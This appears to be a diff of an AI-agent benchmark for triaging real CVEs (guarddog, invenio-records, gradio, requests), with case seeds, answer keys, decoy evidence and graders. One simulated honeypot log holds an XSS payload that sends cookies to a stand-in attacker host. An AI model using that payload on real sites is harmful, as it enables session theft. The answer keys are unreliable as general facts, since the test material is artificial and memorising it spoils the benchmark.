| 393 |
+
"aliases": ["CVE-2022-23531", "GHSA-rp2v-v467-q9vq"],
|
| 394 |
+
"references": [
|
| 395 |
+
{"type": "WEB", "url": "https://github.com/DataDog/guarddog/releases/tag/v0.1.5"},
|
| 396 |
+
{"type": "ADVISORY", "url": "https://github.com/DataDog/guarddog/security/advisories/GHSA-rp2v-v467-q9vq"},
|
| 397 |
+
{"type": "FIX", "url": "https://github.com/DataDog/guarddog/pull/89/commits/a56aff58264cb6b7855d71b00dc10c39a5dbd306"},
|
| 398 |
+
],
|
| 399 |
+
"affected": [
|
| 400 |
+
{
|
| 401 |
+
"package": {"name": "guarddog", "ecosystem": "PyPI"},
|
| 402 |
+
"ranges": [
|
| 403 |
+
{
|
| 404 |
+
"type": "ECOSYSTEM",
|
| 405 |
+
"events": [{"introduced": "0"}, {"fixed": "0.1.5"}],
|
| 406 |
+
}
|
| 407 |
+
],
|
| 408 |
+
}
|
| 409 |
+
],
|
| 410 |
+
"cvss_vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
|
| 411 |
+
"nvd_description": (
|
| 412 |
+
"GuardDog versions prior to 0.1.5 are vulnerable to relative path traversal "
|
| 413 |
+
"when scanning a specially-crafted local PyPI package."
|
| 414 |
+
),
|
| 415 |
+
"epss_score": 0.00152,
|
| 416 |
+
"epss_percentile": 0.36042,
|
| 417 |
+
},
|
| 418 |
+
),
|
| 419 |
+
|
| 420 |
+
# ------------------------------------------------------------------
|
| 421 |
+
# MEDIUM — Conflicting signal resolution, multi-branch versions
|
| 422 |
+
#
|
| 423 |
+
# Agent skill tested: can you weigh contradictory evidence? The
|
| 424 |
+
# EPSS percentile (0.43) maps to "low" exploitability by the formula,
|
| 425 |
+
# but an injected threat-intel evidence item reports real-world active
|
| 426 |
+
# probing. The correct answer is "medium" exploitability because
|
| 427 |
+
# independent field evidence overrides a lagging statistical signal.
|
| 428 |
+
# All four auto-built evidence items PLUS the threat_intel_signal are
|
| 429 |
+
# needed — a model that submits after reading only EPSS will be wrong.
|
| 430 |
+
# ------------------------------------------------------------------
|
| 431 |
+
"task_medium_invenio": RuntimeCaseSeed(
|
| 432 |
+
task_id="task_medium_invenio",
|
| 433 |
+
difficulty="medium",
|
| 434 |
+
title="Invenio Multi-Branch XSS",
|
| 435 |
+
objective=(
|
| 436 |
+
"Resolve affected versions across multiple maintained release lines, weigh "
|
| 437 |
+
"a conflicting exploitability signal, and choose the correct advisory workflow. "
|
| 438 |
+
"The EPSS percentile and the threat-intelligence report disagree — inspect both "
|
| 439 |
+
"before deciding on exploitability."
|
| 440 |
+
),
|
| 441 |
+
max_steps=14,
|
| 442 |
+
osv_id="GHSA-vxh3-mvv7-265j",
|
| 443 |
+
next_action="publish_advisory",
|
| 444 |
+
truth_override={
|
| 445 |
+
"validity": "valid",
|
| 446 |
+
"affected_package": "invenio-records",
|
| 447 |
+
"affected_versions": "<1.0.2 ; >=1.1.0,<1.1.1 ; >=1.2.0,<1.2.2",
|
| 448 |
+
"severity": "medium",
|
| 449 |
+
# KEY: EPSS alone says "low" (0.43 percentile) but the injected
|
| 450 |
+
# threat-intel evidence documents active real-world probing.
|
| 451 |
+
# A model that reads only EPSS will score 0 on exploitability.
|
| 452 |
+
"exploitability": "medium",
|
| 453 |
+
"next_action": "publish_advisory",
|
| 454 |
+
"missing_information": [],
|
| 455 |
+
"supporting_evidence_ids": [
|
| 456 |
+
"osv_advisory",
|
| 457 |
+
"affected_versions",
|
| 458 |
+
"nvd_assessment",
|
| 459 |
+
"threat_intel_signal",
|
| 460 |
+
"github_commit_diff",
|
| 461 |
+
],
|
| 462 |
+
},
|
| 463 |
+
extra_evidence=[
|
| 464 |
+
{
|
| 465 |
+
"evidence_id": "github_commit_diff",
|
| 466 |
+
"title": "GitHub Commit a93b12f",
|
| 467 |
+
"kind": "reference",
|
| 468 |
+
"summary": (
|
| 469 |
+
"```diff\n"
|
| 470 |
+
"@@ -101,3 +101,3 @@\n"
|
| 471 |
+
"- html = \"<div class='record-data'>{}</div>\".format(json.dumps(record.metadata))\n"
|
| 472 |
+
"+ html = \"<div class='record-data'>{}</div>\".format(escape(json.dumps(record.metadata)))\n"
|
| 473 |
+
" return Markup(html)\n"
|
| 474 |
+
"```"
|
| 475 |
+
)
|
| 476 |
+
},
|
| 477 |
+
{
|
| 478 |
+
"evidence_id": "decoy_nvd_invenio_accounts",
|
| 479 |
+
"title": "NVD Entry for invenio-accounts",
|
| 480 |
+
"kind": "severity",
|
| 481 |
+
"summary": "CVE-2018-9999: invenio-accounts allows SQL injection. Severity CRITICAL. (Note: this is a decoy for a different package in the same ecosystem)."
|
| 482 |
+
},
|
| 483 |
+
{
|
| 484 |
+
"evidence_id": "threat_intel_signal",
|
| 485 |
+
"title": "Threat intelligence report",
|
| 486 |
+
"kind": "exploitability",
|
| 487 |
+
"summary": (
|
| 488 |
+
"Honeypot logs captured within 72 hours of publication:\n"
|
| 489 |
+
"[WARN] SRC: 198.51.100.41 URI: /admin/api/records POST payload: {\"title\": \"<script>fetch('http://atk.example/p?c='+document.cookie)</script>\"}\n"
|
| 490 |
+
"[WARN] SRC: 203.0.113.88 URI: /admin/api/records POST payload: {\"title\": \"<img src=x onerror=alert(1)>\"}\n"
|
| 491 |
+
"Evidence of active, weaponised scanning in the wild."
|
| 492 |
+
),
|
| 493 |
+
}
|
| 494 |
+
],
|
| 495 |
+
fallback_snapshot={
|
| 496 |
+
"id": "GHSA-vxh3-mvv7-265j",
|
| 497 |
+
"summary": "Rendering vulnerability in invenio-records",
|
| 498 |
+
"details": (
|
| 499 |
+
"A vulnerability was discovered when rendering JSON for "
|
| 500 |
+
"a record in the administration interface. All supported versions have been "
|
| 501 |
+
"patched and users should upgrade to v1.0.1, v1.1.1, or v1.2.2 depending on "
|
| 502 |
+
"their release line. Review the commit diff to determine the exact vulnerability type."
|
| 503 |
+
),
|
| 504 |
+
"aliases": ["CVE-2019-1020003", "PYSEC-2019-27"],
|
| 505 |
+
"references": [
|
| 506 |
+
{"type": "WEB", "url": "https://github.com/inveniosoftware/invenio-records/security/advisories/GHSA-vxh3-mvv7-265j"},
|
| 507 |
+
{"type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-1020003"},
|
| 508 |
+
],
|
| 509 |
+
"affected": [
|
| 510 |
+
{
|
| 511 |
+
"package": {"name": "invenio-records", "ecosystem": "PyPI"},
|
| 512 |
+
"ranges": [
|
| 513 |
+
{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "1.0.2"}]},
|
| 514 |
+
],
|
| 515 |
+
},
|
| 516 |
+
{
|
| 517 |
+
"package": {"name": "invenio-records", "ecosystem": "PyPI"},
|
| 518 |
+
"ranges": [
|
| 519 |
+
{"type": "ECOSYSTEM", "events": [{"introduced": "1.1.0"}, {"fixed": "1.1.1"}]},
|
| 520 |
+
],
|
| 521 |
+
},
|
| 522 |
+
{
|
| 523 |
+
"package": {"name": "invenio-records", "ecosystem": "PyPI"},
|
| 524 |
+
"ranges": [
|
| 525 |
+
{"type": "ECOSYSTEM", "events": [{"introduced": "1.2.0"}, {"fixed": "1.2.2"}]},
|
| 526 |
+
],
|
| 527 |
+
},
|
| 528 |
+
],
|
| 529 |
+
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N",
|
| 530 |
+
"nvd_description": "invenio-records before 1.2.2 allows XSS.",
|
| 531 |
+
"epss_score": 0.00206,
|
| 532 |
+
"epss_percentile": 0.42837,
|
| 533 |
+
},
|
| 534 |
+
),
|
| 535 |
+
|
| 536 |
+
# ------------------------------------------------------------------
|
| 537 |
+
# HARD — Recognizing uncertainty, resisting premature action
|
| 538 |
+
#
|
| 539 |
+
# Agent skill tested: can you decide NOT to act when information is
|
| 540 |
+
# missing? This case simulates an early-disclosure scenario where
|
| 541 |
+
# the vulnerability is confirmed (validity=valid) but NO PATCH HAS
|
| 542 |
+
# BEEN RELEASED. The vendor_status evidence explicitly states this.
|
| 543 |
+
# Publishing an advisory with no fixed version would be wrong —
|
| 544 |
+
# it alarms users with no actionable remediation path.
|
| 545 |
+
#
|
| 546 |
+
# The correct answer is next_action=request_info.
|
| 547 |
+
# A model that blindly pattern-matches "real CVE → publish_advisory"
|
| 548 |
+
# will lose the 15% next_action weight. A model that reads the
|
| 549 |
+
# vendor_status evidence and recognises the missing patch will
|
| 550 |
+
# choose request_info and score full marks.
|
| 551 |
+
#
|
| 552 |
+
# The affected_versions ">=0" (no fixed marker) is a cue that the
|
| 553 |
+
# snapshot encodes. Smart agents notice it.
|
| 554 |
+
# ------------------------------------------------------------------
|
| 555 |
+
"task_hard_gradio": RuntimeCaseSeed(
|
| 556 |
+
task_id="task_hard_gradio",
|
| 557 |
+
difficulty="hard",
|
| 558 |
+
title="Gradio XSS — Patch Pending, No Fix Released",
|
| 559 |
+
objective=(
|
| 560 |
+
"Triage a confirmed vulnerability in a widely deployed package where no patch "
|
| 561 |
+
"has been published yet. Determine validity, read all evidence including the "
|
| 562 |
+
"upstream vendor status report, identify what information is missing, and choose "
|
| 563 |
+
"whether to publish an advisory now or request upstream action first."
|
| 564 |
+
),
|
| 565 |
+
max_steps=18,
|
| 566 |
+
osv_id="PYSEC-2024-220",
|
| 567 |
+
next_action="request_info",
|
| 568 |
+
missing_information=[
|
| 569 |
+
"no fixed version published by upstream maintainer",
|
| 570 |
+
"CVSSv4 score not yet assessed for CVE-2024-47872",
|
| 571 |
+
"no public proof-of-concept exploit code referenced",
|
| 572 |
+
],
|
| 573 |
+
truth_override={
|
| 574 |
+
"validity": "valid",
|
| 575 |
+
"affected_package": "gradio",
|
| 576 |
+
# All versions affected — no fix exists yet in this scenario
|
| 577 |
+
"affected_versions": ">=0",
|
| 578 |
+
"severity": "medium",
|
| 579 |
+
# EPSS unavailable (score=0, percentile=0) → default low
|
| 580 |
+
"exploitability": "low",
|
| 581 |
+
# KEY: publishing an advisory with no fixed version is wrong.
|
| 582 |
+
# The analyst must contact the maintainer first.
|
| 583 |
+
"next_action": "request_info",
|
| 584 |
+
"missing_information": [
|
| 585 |
+
"no fixed version published by upstream maintainer",
|
| 586 |
+
"CVSSv4 score not yet assessed for CVE-2024-47872",
|
| 587 |
+
"no public proof-of-concept exploit code referenced",
|
| 588 |
+
],
|
| 589 |
+
"supporting_evidence_ids": ["osv_advisory", "vendor_status"],
|
| 590 |
+
},
|
| 591 |
+
extra_evidence=[
|
| 592 |
+
{
|
| 593 |
+
"evidence_id": "vendor_status",
|
| 594 |
+
"title": "Upstream maintainer status",
|
| 595 |
+
"kind": "reference",
|
| 596 |
+
"summary": (
|
| 597 |
+
"GitHub Issue #1289 (gradio-app/gradio):\n\n"
|
| 598 |
+
"@reporter: Attached PoC shows XSS execution upon SVG upload. Can we get this fixed?\n"
|
| 599 |
+
"@maintainer: Thanks for the report. I can confirm the behavior in the current release. "
|
| 600 |
+
"We need to completely rewrite the file upload sanitizer to properly fix this without "
|
| 601 |
+
"breaking backwards compatibility. No ETA on the rewrite yet, so we don't have a patch ready."
|
| 602 |
+
),
|
| 603 |
+
}
|
| 604 |
+
],
|
| 605 |
+
fallback_snapshot={
|
| 606 |
+
"id": "PYSEC-2024-220",
|
| 607 |
+
"details": (
|
| 608 |
+
"Gradio servers that permit file uploads are vulnerable to Cross-Site Scripting. "
|
| 609 |
+
"Authenticated users can upload HTML, JavaScript, or SVG files containing "
|
| 610 |
+
"malicious scripts that execute in other users' browsers. This advisory was "
|
| 611 |
+
"filed before a patched release was available. No fixed version is listed."
|
| 612 |
+
),
|
| 613 |
+
"aliases": ["CVE-2024-47872", "GHSA-gvv6-33j7-884g"],
|
| 614 |
+
"references": [
|
| 615 |
+
{"type": "ADVISORY", "url": "https://github.com/gradio-app/gradio/security/advisories/GHSA-gvv6-33j7-884g"},
|
| 616 |
+
],
|
| 617 |
+
"affected": [
|
| 618 |
+
{
|
| 619 |
+
"package": {"name": "gradio", "ecosystem": "PyPI"},
|
| 620 |
+
"ranges": [
|
| 621 |
+
# No "fixed" event — all versions affected, no patch yet
|
| 622 |
+
{"type": "ECOSYSTEM", "events": [{"introduced": "0"}]},
|
| 623 |
+
],
|
| 624 |
+
}
|
| 625 |
+
],
|
| 626 |
+
"cvss_vector": "Not yet available",
|
| 627 |
+
# No NVD entry yet — too recent
|
| 628 |
+
"nvd_description": "",
|
| 629 |
+
# No EPSS data — CVE too new for scoring
|
| 630 |
+
"epss_score": 0.0,
|
| 631 |
+
"epss_percentile": 0.0,
|
| 632 |
+
},
|
| 633 |
+
),
|
| 634 |
+
"task_medium_requests": RuntimeCaseSeed(
|
| 635 |
+
task_id="task_medium_requests",
|
| 636 |
+
difficulty="medium",
|
| 637 |
+
title="Requests Authorization Header Leak",
|
| 638 |
+
objective="Resolve affected versions, weigh a conflicting exploitability signal, and inspect code diffs to determine if headers are properly stripped on redirects.",
|
| 639 |
+
max_steps=14,
|
| 640 |
+
osv_id="PYSEC-2018-32",
|
| 641 |
+
next_action="publish_advisory",
|
| 642 |
+
truth_override={
|
| 643 |
+
"validity": "valid",
|
| 644 |
+
"affected_package": "requests",
|
| 645 |
+
"affected_versions": "<2.20.0",
|
| 646 |
+
"severity": "medium",
|
| 647 |
+
"exploitability": "medium",
|
| 648 |
+
"next_action": "publish_advisory",
|
| 649 |
+
"missing_information": [],
|
| 650 |
+
"supporting_evidence_ids": [
|
| 651 |
+
"osv_advisory",
|
| 652 |
+
"affected_versions",
|
| 653 |
+
"nvd_assessment",
|
| 654 |
+
"github_commit_diff",
|
| 655 |
+
],
|
| 656 |
+
},
|
| 657 |
+
extra_evidence=[
|
| 658 |
+
{
|
| 659 |
+
"evidence_id": "github_commit_diff",
|
| 660 |
+
"title": "GitHub Commit 0f78d3c",
|
| 661 |
+
"kind": "reference",
|
| 662 |
+
"summary": (
|
| 663 |
+
"```diff\n"
|
| 664 |
+
"@@ -101,3 +101,3 @@\n"
|
| 665 |
+
" def rebuild_auth(self, prepared_request, response):\n"
|
| 666 |
+
"+ url = urlparse(response.url)\n"
|
| 667 |
+
"+ if url.hostname != prepared_request.url.hostname:\n"
|
| 668 |
+
"+ prepared_request.headers.pop('Authorization', None)\n"
|
| 669 |
+
"```"
|
| 670 |
+
)
|
| 671 |
+
},
|
| 672 |
+
{
|
| 673 |
+
"evidence_id": "decoy_threat_intel_aiohttp",
|
| 674 |
+
"title": "Threat Intel: aiohttp",
|
| 675 |
+
"kind": "exploitability",
|
| 676 |
+
"summary": "[CRITICAL] SSRF exploitation actively seen against the aiohttp python library. Rate severity Critical. (Note: Decoy for unrelated package)."
|
| 677 |
+
}
|
| 678 |
+
],
|
| 679 |
+
fallback_snapshot={
|
| 680 |
+
"id": "PYSEC-2018-32",
|
| 681 |
+
"summary": "Header linkage in redirects",
|
| 682 |
+
"details": (
|
| 683 |
+
"When sending requests with an Authorization header, if the server redirects to a different "
|
| 684 |
+
"host it could inadvertently leak the credentials. Review the commit diff to see the vulnerability mechanism."
|
| 685 |
+
),
|
| 686 |
+
"aliases": ["CVE-2018-18074"],
|
| 687 |
+
"references": [],
|
| 688 |
+
"affected": [
|
| 689 |
+
{
|
| 690 |
+
"package": {"name": "requests", "ecosystem": "PyPI"},
|
| 691 |
+
"ranges": [
|
| 692 |
+
{"type": "ECOSYSTEM", "events": [{"introduced": "0"}, {"fixed": "2.20.0"}]}
|
| 693 |
+
]
|
| 694 |
+
}
|
| 695 |
+
],
|
| 696 |
+
"cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N",
|
| 697 |
+
"nvd_description": "The Requests package through 2.19.1 before 2.20.0 sends an HTTP Authorization header to an http URI upon receiving a redirect response.",
|
| 698 |
+
"epss_score": 0.00512,
|
| 699 |
+
"epss_percentile": 0.612,
|
| 700 |
+
},
|
| 701 |
+
),
|
| 702 |
+
}
|
| 703 |
+
|
| 704 |
+
|
| 705 |
+
TASK_ORDER = list(SEEDS.keys())
|
| 706 |
+
DIFFICULTY_ORDER = ["easy", "medium", "hard"]
|
| 707 |
+
|
| 708 |
+
|
| 709 |
+
@lru_cache(maxsize=16)
|
| 710 |
+
def get_case_definition(task_id: str) -> CaseDefinition:
|
| 711 |
+
seed = SEEDS[task_id]
|
| 712 |
+
try:
|
| 713 |
+
snapshot = _fetch_live_snapshot(seed)
|
| 714 |
+
except Exception:
|
| 715 |
+
snapshot = _load_snapshot_file(seed.osv_id) or seed.fallback_snapshot
|
| 716 |
+
return _build_case(seed, snapshot)
|
| 717 |
+
|
| 718 |
+
|
| 719 |
+
CASE_DEFINITIONS: Dict[str, CaseDefinition] = {
|
| 720 |
+
task_id: _build_case(seed, seed.fallback_snapshot) for task_id, seed in SEEDS.items()
|
| 721 |
+
}
|
| 722 |
+
|
| 723 |
+
|
| 724 |
+
BENCHMARK_TASKS_BY_DIFFICULTY: Dict[str, List[str]] = {
|
| 725 |
+
difficulty: [
|
| 726 |
+
task_id for task_id in TASK_ORDER if SEEDS[task_id].difficulty == difficulty
|
| 727 |
+
]
|
| 728 |
+
for difficulty in DIFFICULTY_ORDER
|
| 729 |
+
}
|
| 730 |
+
|
| 731 |
+
|
| 732 |
+
def choose_balanced_task_id(seed: Optional[int], rng: random.Random) -> str:
|
| 733 |
+
"""Choose a benchmark task with balanced random difficulty sampling.
|
| 734 |
+
|
| 735 |
+
If a seed is provided, selection is deterministic from that seed.
|
| 736 |
+
Otherwise, sampling uses the environment RNG state.
|
| 737 |
+
"""
|
| 738 |
+
|
| 739 |
+
chooser = random.Random(seed) if seed is not None else rng
|
| 740 |
+
difficulty = chooser.choice(DIFFICULTY_ORDER)
|
| 741 |
+
bucket = BENCHMARK_TASKS_BY_DIFFICULTY[difficulty]
|
| 742 |
+
return chooser.choice(bucket)
|
server/graders.py
ADDED
|
@@ -0,0 +1,121 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""Deterministic graders for the vulnerability triage benchmark."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import re
|
| 6 |
+
from typing import Dict, Iterable, List
|
| 7 |
+
|
| 8 |
+
try:
|
| 9 |
+
from ..models import TriageDraft
|
| 10 |
+
from .cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition
|
| 11 |
+
except ImportError:
|
| 12 |
+
from models import TriageDraft
|
| 13 |
+
from server.cases import CASE_DEFINITIONS, CaseDefinition, get_case_definition
|
| 14 |
+
|
| 15 |
+
|
| 16 |
+
WEIGHTS: Dict[str, float] = {
|
| 17 |
+
"validity": 0.20,
|
| 18 |
+
"affected_package": 0.10,
|
| 19 |
+
"affected_versions": 0.10,
|
| 20 |
+
"severity": 0.20,
|
| 21 |
+
"exploitability": 0.15,
|
| 22 |
+
"next_action": 0.15,
|
| 23 |
+
"missing_information": 0.10,
|
| 24 |
+
}
|
| 25 |
+
|
| 26 |
+
|
| 27 |
+
def normalize_text(value: str) -> str:
|
| 28 |
+
return " ".join(value.strip().lower().split())
|
| 29 |
+
|
| 30 |
+
|
| 31 |
+
def normalize_list(values: Iterable[str]) -> List[str]:
|
| 32 |
+
return sorted({normalize_text(value) for value in values if normalize_text(value)})
|
| 33 |
+
|
| 34 |
+
|
| 35 |
+
def set_similarity(actual: Iterable[str], expected: Iterable[str]) -> float:
|
| 36 |
+
actual_set = set(normalize_list(actual))
|
| 37 |
+
expected_set = set(normalize_list(expected))
|
| 38 |
+
if not actual_set and not expected_set:
|
| 39 |
+
return 1.0
|
| 40 |
+
if not actual_set or not expected_set:
|
| 41 |
+
return 0.0
|
| 42 |
+
union = actual_set | expected_set
|
| 43 |
+
return len(actual_set & expected_set) / len(union)
|
| 44 |
+
|
| 45 |
+
|
| 46 |
+
def field_match(actual: str, expected: str) -> float:
|
| 47 |
+
return 1.0 if normalize_text(actual) == normalize_text(expected) else 0.0
|
| 48 |
+
|
| 49 |
+
|
| 50 |
+
def _normalize_version_range(value: str) -> str:
|
| 51 |
+
"""Canonicalize a version range string for flexible comparison.
|
| 52 |
+
|
| 53 |
+
Two representations that are treated as equivalent:
|
| 54 |
+
- A trivial lower bound ``>=0`` / ``>=0.0`` / ``>=0.0.0`` followed by a
|
| 55 |
+
comma is stripped, so ``>=0,<0.1.5`` compares equal to ``<0.1.5``.
|
| 56 |
+
- Semicolon-separated multi-branch segments are sorted so submission
|
| 57 |
+
order does not matter.
|
| 58 |
+
"""
|
| 59 |
+
text = normalize_text(value)
|
| 60 |
+
segments = [seg.strip() for seg in text.split(";") if seg.strip()]
|
| 61 |
+
normalized: List[str] = []
|
| 62 |
+
for seg in segments:
|
| 63 |
+
# Remove trivial lower-bound prefix: >=0, >=0.0, >=0.0.0 before comma
|
| 64 |
+
seg = re.sub(r">=\s*0(?:\.0)*\s*,\s*", "", seg)
|
| 65 |
+
# Collapse whitespace around comparison operators
|
| 66 |
+
seg = re.sub(r"\s*([><=!]+)\s*", r"\1", seg).strip()
|
| 67 |
+
if seg:
|
| 68 |
+
normalized.append(seg)
|
| 69 |
+
return " ; ".join(sorted(normalized))
|
| 70 |
+
|
| 71 |
+
|
| 72 |
+
def version_range_match(actual: str, expected: str) -> float:
|
| 73 |
+
"""Score 1.0 when version ranges are semantically equivalent."""
|
| 74 |
+
return (
|
| 75 |
+
1.0
|
| 76 |
+
if _normalize_version_range(actual) == _normalize_version_range(expected)
|
| 77 |
+
else 0.0
|
| 78 |
+
)
|
| 79 |
+
|
| 80 |
+
|
| 81 |
+
def grade_case(case: CaseDefinition, draft: TriageDraft) -> Dict[str, float]:
|
| 82 |
+
breakdown = {
|
| 83 |
+
"validity": field_match(draft.validity, case.truth.validity),
|
| 84 |
+
"affected_package": field_match(
|
| 85 |
+
draft.affected_package, case.truth.affected_package
|
| 86 |
+
),
|
| 87 |
+
"affected_versions": version_range_match(
|
| 88 |
+
draft.affected_versions, case.truth.affected_versions
|
| 89 |
+
),
|
| 90 |
+
"severity": field_match(draft.severity, case.truth.severity),
|
| 91 |
+
"exploitability": field_match(
|
| 92 |
+
draft.exploitability, case.truth.exploitability
|
| 93 |
+
),
|
| 94 |
+
"next_action": field_match(draft.next_action, case.truth.next_action),
|
| 95 |
+
"missing_information": set_similarity(
|
| 96 |
+
draft.missing_information, case.truth.missing_information
|
| 97 |
+
),
|
| 98 |
+
}
|
| 99 |
+
breakdown["total"] = round(
|
| 100 |
+
sum(breakdown[name] * WEIGHTS[name] for name in WEIGHTS), 4
|
| 101 |
+
)
|
| 102 |
+
|
| 103 |
+
# Cascading Difficulty Penalties
|
| 104 |
+
difficulty = getattr(case, 'difficulty', 'hard')
|
| 105 |
+
|
| 106 |
+
# HARD Penalty: if truth action is request_info (meaning a patch is missing)
|
| 107 |
+
# and the model tries to publish an advisory or patch, it's a critical logic failure.
|
| 108 |
+
if difficulty == "hard" and case.truth.next_action == "request_info" and draft.next_action in {"publish_advisory", "patch"}:
|
| 109 |
+
breakdown["total"] = round(breakdown["total"] * 0.5, 4)
|
| 110 |
+
|
| 111 |
+
# MEDIUM Penalty: Medium tasks specifically test the ability to decode
|
| 112 |
+
# raw intelligence (code diffs, conflicting EPSS/honeypot numbers) against decoys.
|
| 113 |
+
# If a model fails to extract both severity and exploitability accurately, it failed the core challenge.
|
| 114 |
+
elif difficulty == "medium" and breakdown["severity"] == 0.0 and breakdown["exploitability"] == 0.0:
|
| 115 |
+
breakdown["total"] = round(breakdown["total"] * 0.75, 4)
|
| 116 |
+
|
| 117 |
+
return breakdown
|
| 118 |
+
|
| 119 |
+
|
| 120 |
+
def grade_task(task_id: str, draft: TriageDraft) -> Dict[str, float]:
|
| 121 |
+
return grade_case(get_case_definition(task_id), draft)
|
server/requirements.txt
ADDED
|
@@ -0,0 +1 @@
|
|
|
|
|
|
|
| 1 |
+
openenv-core[core]>=0.2.3
|
server/vuln_triage_env_environment.py
ADDED
|
@@ -0,0 +1,315 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
| 1 |
+
"""OpenEnv environment implementation for vulnerability triage."""
|
| 2 |
+
|
| 3 |
+
from __future__ import annotations
|
| 4 |
+
|
| 5 |
+
import random
|
| 6 |
+
from typing import Dict, List, Optional
|
| 7 |
+
from uuid import uuid4
|
| 8 |
+
|
| 9 |
+
from openenv.core.env_server.interfaces import Environment
|
| 10 |
+
|
| 11 |
+
try:
|
| 12 |
+
from ..models import EvidenceItem, TriageDraft, VulnTriageAction, VulnTriageObservation, VulnTriageState
|
| 13 |
+
